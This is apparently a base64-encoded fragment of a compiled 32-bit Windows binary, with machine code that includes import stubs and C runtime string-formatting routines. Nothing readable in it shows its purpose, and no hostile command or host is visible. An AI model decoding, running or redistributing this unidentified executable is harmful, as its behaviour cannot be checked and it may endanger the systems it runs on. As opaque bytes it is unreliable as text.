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f8v7/g8QMhcB0PIuEJJAAAACJRCQMO8N0LY1EJCSJRCQUahyLxlCNRCQcUOiy8v7/g8QMhcB0D2gAAABAjUQkLOjE4P//WV9eW4vlXcIEAGoBuHCVARDo7tz//1nDVYvsg+T4g+wcU1YzwI1MJBxXi30IiUwkHIsPiUQkIIlEJCSJRCQYiUQkEIsRiVQkFDkFWMMCEHUwaETcAhBQaEDcAhBqBWiAwwIQvkDDAhDokeX//4PEFIXAdQ1owPEBEOhn+/7/WetxoUDcAhD/dwiLHUTcAhCJRCQUjUQkFFBqEF6DwxjoIOb//1lZiUQkEIXAdEVTakD/FQySARCJRCQYhcB0NFONRCQUUI1EJCBQ6M/x/v+DxAyFwHQToUTcAhCLTCQYagADwejd3///Wf90JBj/FRCSARBfXluL5V3CBAD/JQCQARD/JQSQARD/JQiQARD/JVCQARD/JWCQARD/JbCQARD/JbSQARD/JbyQARD/JcyQARD/JcCSARD/JaySARD/JbySARD/JbiSARD/JbSSARD/JbCSARD/JVCSARD/JVSSARD/JViSARD/JVySARD/JUySARD/JUiSARD/JUSSARD/JUCSARD/JTySARD/JSiSARD/JTiSARD/JSySARD/JTCSARD/JTSSARD/JYiSARD/JXySARD/JYySARD/JYCSARD/JYSSARD/JaSSARD/JZySARD/JaCSARD/JaSTARD/JaCTARD/JZyTARD/JZiTARD/JZSTARD/JZCTARD/JYyTARD/JYiTARD/JYSTARD/JYCTARD/JWCTARD/JaiTARD/JayTARD/JbCTARD/JbSTARD/JbiTARD/JbyTARD/JcCTARD/JcSTARD/JciTARCL/1WL7IHs0AIAAKEAwAIQM8WJRfyJheD9//+Jjdz9//+Jldj9//+JndT9//+JtdD9//+Jvcz9//9mjJX4/f//ZoyN7P3//2aMncj9//9mjIXE/f//ZoylwP3//2aMrbz9//+cj4Xw/f//i0UEiYXo/f//jUUEx4Uw/f//AQABAImF9P3//4tA/GjwkwEQiYXk/f///xVEkQEQi038M83oFAAAAMnDi/9Vi+xd6U/////M/yUUkwEQOw0AwAIQdQPCAADpgwkAAIv/VYvsU1aLdQgz2zvzdAU5XQx3IP8VFJMBEMcAFgAAAFNTU1N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/ibW8/f//iI3v/f//hMkPhA4KAABDObXY/f//iZ2g/f//D4zmCQAAisEsIDxYdw8PvsEPtoAYlAEQg+AP6wIzwIuVwP3//2vACQ+2hBA4lAEQwegEiYXA/f//g/gID4Rk////agdaO8IPh1YJAAD/JIWMQgEQg43o/f///4m1xP3//4m1sP3//4m1zP3//4m10P3//4m18P3//4m1yP3//+ktCQAAD77Bg+ggdEqD6AN0NoPoCHQlSEh0FYPoAw+FAAkAAION8P3//wjpAgkAAION8P3//wTp9ggAAION8P3//wHp6ggAAIGN8P3//4AAAADp2wgAAION8P3//wLpzwgAAID5KnUriweDxwQ7xom93P3//4mFzP3//w+NsQgAAION8P3//wT3ncz9///pnwgAAIuFzP3//2vACg++yY1ECNCJhcz9///phAgAAIm16P3//+l5CAAAgPkqdSWLB4PHBDvGib3c/f//iYXo/f//D41bCAAAg43o/f///+lPCAAAi4Xo/f//a8AKD77JjUQI0ImF6P3//+k0CAAAgPlJdE+A+Wh0PoD5bHQYgPl3D4UcCAAAgY3w/f//AAgAAOkNCAAAgDtsdRBDgY3w/f//ABAAAOn4BwAAg43w/f//EOnsBwAAg43w/f//IOngBwAAigM8NnUXgHsBNHURQ0OBjfD9//8AgAAA6cMHAAA8M3UXgHsBMnURQ0OBpfD9////f///6agHAAA8ZA+EoAcAADxpD4SYBwAAPG8PhJAHAAA8dQ+EiAcAADx4D4SABwAAPFgPhHgHAACJtcD9//8PtsFQibXI/f///xUIkwEQWYXAdCiLjbT9//+Khe/9//+Ntdj9///ol/r//4oDQ4iF7/3//4TAD4RIBwAAi420/f//ioXv/f//jbXY/f//6G/6///pFwcAAA++wYP4ZA+PFgIAAA+EZwIAAIP4Uw+P8gAAAA+EgAAAAIPoQXQQSEh0WEhIdAhISA+FRQUAAIDBIMeFxP3//wEAAACIje/9//+DjfD9//9AObXo/f//jYX0/f//iYXk/f//uAACAACJhaz9//8PjTUCAADHhej9//8GAAAA6ZQCAAD3hfD9//8wCAAAD4WYAAAAgY3w/f//AAgAAOmJAAAA94Xw/f//MAgAAHUKgY3w/f//AAgAAIuN6P3//4P5/3UFuf///3+DxwT3hfD9//8QCAAAib3c/f//i3/8ib3k/f//D4RkBAAAO/51C6EUwAIQiYXk/f//i4Xk/f//x4XI/f//AQAAAOkyBAAAg+hYD4SNAgAASEh0eSvCD4Qn////SEgPhVEEAACDxwT3hfD9//8QCAAAib3c/f//dDAPt0f8UGgAAgAAjYX0/f//UI2F4P3//1DoZvr//4PEEIXAdB/HhbD9//8BAAAA6xOKR/yIhfT9///HheD9//8BAAAAjYX0/f//iYXk/f//6egDAACLB4PHBIm93P3//zvGdGSLcAQz/zv3dFsPtwhmOUgCD4KMBQAA94Xw/f//AAgAAA+3wXQuM8mL0PfSQYTRD4RuBQAAi9b30oTRD4RiBQAAibXk/f//0eiJjcj9///pgAMAAIm9yP3//4m15P3//+lvAwAAoRDAAhCJheT9//+NUAGKCECEyXX5K8LpUwMAAIP4cA+PgAEAAA+EaAEAAIP4ZQ+MQQMAAIP4Zw+OBv7//4P4aXQxg/huD4S9+v//g/hvD4UhAwAA9oXw/f//gMeF4P3//wgAAAB0HYGN8P3//wACAADrEYON8P3//0DHheD9//8KAAAAi4Xw/f//qQCAAAAPhG8BAACLB4tXBIPHCOmXAQAAdRGA+Wd1Z8eF6P3//wEAAADrWzmF6P3//34GiYXo/f//u6MAAAA5nej9//9+Oou16P3//4HGXQEAAFb/FUSTARBZio3v/f//iYW8/f//hcB0DomF5P3//4m1rP3//+sOiZ3o/f//6waKje/9///2hfD9//+AdAqBjcT9//+AAAAAiwf/tcT9//+LteT9////tej9//+DxwiJhZj9//+LR/yJhZz9//8PvsFQ/7Ws/f//jYWY/f//VlCJvdz9///opff//4PEGIA+LXUQgY3w/f//AAEAAP+F5P3//4uF5P3//41QAYoIQITJdfnpgv7//8eF6P3//wgAAACJlbj9///rJIPocw+EA/3//0hID4TE/v//g+gDD4W2AQAAx4W4/f//JwAAAPaF8P3//4DHheD9//8QAAAAD4Sk/v//ioW4/f//BFHGhdT9//8wiIXV/f//x4XQ/f//AgAAAOmA/v//qQAQAAAPhYb+//+DxwSoIHQXib3c/f//qEB0Bg+/R/zrBA+3R/yZ6xKoQItH/HQDmesCM9KJvdz9///2hfD9//9AdBs71n8XfAQ7xnMR99iD0gD32oGN8P3//wABAAD3hfD9//8AkAAAi9qL+HUCM9uDvej9//8AfQzHhej9//8BAAAA6xqDpfD9///3uAACAAA5hej9//9+BomF6P3//4vHC8N1BiGF0P3//41184uF6P3///+N6P3//4XAfwaLxwvDdC2LheD9//+ZUlBTV+ik9P//g8Ewg/k5iZ2s/f//i/iL2n4GA424/f//iA5O672NRfMrxkb3hfD9//8AAgAAiYXg/f//ibXk/f//dGGFwHQHi86AOTB0Vv+N5P3//4uN5P3//8YBMEDrPklmOTB0BkBAO8519CuF5P3//9H46yg7/nULoRDAAhCJheT9//+LheT9///rB0mAOAB0BUA7znX1K4Xk/f//iYXg/f//g72w/f//AA+FZgEAAIuF8P3//6hAdDKpAAEAAHQJxoXU/f//LesYqAF0CcaF1P3//yvrC6gCdBHGhdT9//8gx4XQ/f//AQAAAIudzP3//yud4P3//yud0P3///aF8P3//wx1F/+1tP3//42F2P3//1NqIOiq9P//g8QM/7XQ/f//i720/f//jYXY/f//jY3U/f//6LD0///2hfD9//8IWXQb9oXw/f//BHUSV1NqMI2F2P3//+ho9P//g8QMg73I/f//AHRxg73g/f//AH5oi4Xg/f//i7Xk/f//iYWs/f//D7cG/42s/f//UGoGjUX0UI2FpP3//0ZQRuhI9f//g8QQhcB1KDmFpP3//3Qg/7Wk/f//jYXY/f//jU306Cb0//+Dvaz9//8AWXW16yGDjdj9////6xj/teD9//+LjeT9//+Nhdj9///o+vP//1mDvdj9//8AfBv2hfD9//8EdBJXU2ogjYXY/f//6LLz//+DxAyDvbz9//8AdBT/tbz9////FTCTARCDpbz9//8AWYudoP3//4u93P3//zP2igOIhe/9//+EwHQvisjpL/b///8VFJMBEMcAFgAAADPAUFBQUFDp2/X///8VFJMBEFdXV1dX6cX1//85tcD9//90DYO9wP3//wcPhaX1//+Lhdj9//+LTfxfXjPNW+iF5///ycOQtDoBEMk4ARD5OAEQVzkBEKI5ARCtOQEQ8jkBEA07ARCL/1WL7IPsIFeLfQyD//91CcdF5P///3/rK4H/////f3Yg/xUUkwEQxwAWAAAAM8BQUFBQUOgW5///g8QUg8j/62qJfeRTVv91FIt1CP91EI1F4FCJdeiJdeDHRexCAAAA6Kb0//+L2DPAg8QMO9iIRD7/fRE5ReR8LTvwdCU7+HYhiAbrHf9N5HgHi03giAHrEY1N4FFQ6Iw4AABZWYP4/3QEi8PrA2r+WF5bX8nDi0gM9sFAdAaDeAgAdDWDQAT+uv//AAB4DYsIZokxgwACD7fO6wiDySCJSAyLymY7ynUQUP8V8JIBEFmFwHQEgw//w/8Hw4v/VYvsg30MAFeL+H4bVotFEIt1CP9NDOid////gz//dAaDfQwAf+deX13Di/9Vi+z2QwxAV4v4dA2DewgAdQeLRQwBB+s8g30MAH42VotFCA+3MP9NDIvD6Fz///+DRQgCgz//dRX/FRSTARCDOCp1EGo/i8Ne6D7///+DfQwAf8xeX13Di/9Vi+yB7GgEAAChAMACEDPFiUX8i0UIU4tdEFaLdQxXM/+Jhdj7//+Jnej7//+JvbT7//+Jvfj7//+JvdD7//+JvfT7//+Jvdz7//+Jvcj7//+Jvaz7//+JvdT7//87x3Uh/xUUkwEQV1dXV1fHABYAAADoXOX//4PEFIPI/+k/CgAAO/d02w+3Dom94Pv//4m97Pv//4m9wPv//4m9uPv//4mN5Pv//2Y7zw+ECwoAAEZGOb3g+///ibWw+///D4ziCQAAjUHgZoP4WHcPD7fBD7aAGJQBEIPgD+sCM8CLlcD7//9rwAkPtoQQOJQBEGoIwegEWomFwPv//zvCD4Re////g/gHD4d3CQAA/ySF+04BEION9Pv///+Jvcj7//+Jvaz7//+JvdD7//+Jvdz7//+Jvfj7//+JvdT7///pTgkAAA+3wYPoIHRIg+gDdDQrwnQkSEh0FIPoAw+FIgkAAAmV+Pv//+klCQAAg434+///BOkZCQAAg434+///AekNCQAAgY34+///gAAAAOn+CAAAg434+///AunyCAAAZoP5KnUriwODwwQ7x4md6Pv//4mF0Pv//w+N0wgAAION+Pv//wT3ndD7///pwQgAAIuF0Pv//2vACg+3yY1ECNCJhdD7///ppggAAIm99Pv//+mbCAAAZoP5KnUliwODwwQ7x4md6Pv//4mF9Pv//w+NfAgAAION9Pv////pcAgAAIuF9Pv//2vACg+3yY1ECNCJhfT7///pVQgAAA+3wYP4SXRRg/hodECD+Gx0GIP4dw+FOggAAIGN+Pv//wAIAADpKwgAAGaDPmx1EUZGgY34+///ABAAAOkUCAAAg434+///EOkICAAAg434+///IOn8BwAAD7cGZoP4NnUZZoN+AjR1EoPGBIGN+Pv//wCAAADp2gcAAGaD+DN1GWaDfgIydRKDxgSBpfj7////f///6bsHAABmg/hkD4SxBwAAZoP4aQ+EpwcAAGaD+G8PhJ0HAABmg/h1D4STBwAAZoP4eA+EiQcAAGaD+FgPhH8HAACJvcD7//+Lhdj7//+NveD7//+L8ceF1Pv//wEAAADo/fv//+lPBwAAD7fBg/hkD49KAgAAD4SXAgAAg/hTD48TAQAAdH2D6EF0EEhIdFhISHQISEgPhXoFAACDwSDHhcj7//8BAAAAiY3k+///g434+///QDm99Pv//42F/Pv//4mF8Pv//7gAAgAAiYXM+///D41pAgAAx4X0+///BgAAAOnBAgAA94X4+///MAgAAA+FwgAAAION+Pv//yDptgAAAPeF+Pv//zAIAAB1B4ON+Pv//yCLvfT7//+D//91Bb////9/g8ME9oX4+///IImd6Pv//4tb/Imd8Pv//w+ElAQAAIXbdQuhEMACEImF8Pv//4Ol7Pv//wCLtfD7//+F/w+OrAQAAIoGhMAPhKIEAAAPtsBQ/xUIkwEQWYXAdAFGRv+F7Pv//zm97Pv//3zX6X4EAACD6FgPhJECAABISA+EigAAAIPoBw+E/f7//0hID4VcBAAAD7cDg8MEM/ZG9oX4+///IIm11Pv//4md6Pv//4mFqPv//3Q3iIW8+///oQyTARDGhb37//8A/zCNhbz7//9QjYX8+///UP8VEJMBEIPEDIXAfQ+Jtaz7///rB2aJhfz7//+Nhfz7//+JhfD7//+Jtez7///p4wMAAIsDg8MEiZ3o+///O8d0YotwBDv3dFsPtwhmOUgCD4I7+///94X4+///AAgAAA+3wXQuM8mL0PfSQYTRD4Qd+///i9b30oTRD4QR+///ibXw+///0eiJjdT7///pfQMAAIm91Pv//4m18Pv//+lsAwAAoRDAAhCJhfD7//+NUAGKCECEyXX5K8LpUAMAAIP4cA+PdQEAAA+EXQEAAIP4ZQ+MPgMAAIP4Zw+Ozv3//4P4aXQtg/huD4Si+v//g/hvD4UeAwAA9oX4+///gImV5Pv//3QdgY34+///AAIAAOsRg434+///QMeF5Pv//woAAACLhfj7//+pAIAAAA+EbQEAAAPai0P4i1P86ZUBAAB1EmaD+Wd1X8eF9Pv//wEAAADrUzmF9Pv//34GiYX0+///v6MAAAA5vfT7//9+OIu19Pv//4HGXQEAAFb/FUSTARBZi43k+///iYW4+///hcB0DomF8Pv//4m1zPv//+sGib30+///9oX4+///gHQKgY3I+///gAAAAIsD/7XI+///i7Xw+////7X0+///g8MIiYWY+///i0P8iYWc+///D77BUP+1zPv//42FmPv//1ZQiZ3o+///6Cbr//+DxBiAPi11EIGN+Pv//wABAAD/hfD7//+LhfD7//+NUAGKCECEyXX56Y3+//+JlfT7///HhbT7//8HAAAA6ySD6HMPhND8//9ISA+Ey/7//4PoAw+FvgEAAMeFtPv//ycAAAD2hfj7//+Ax4Xk+///EAAAAA+Eq/7//2owWGaJhcT7//+L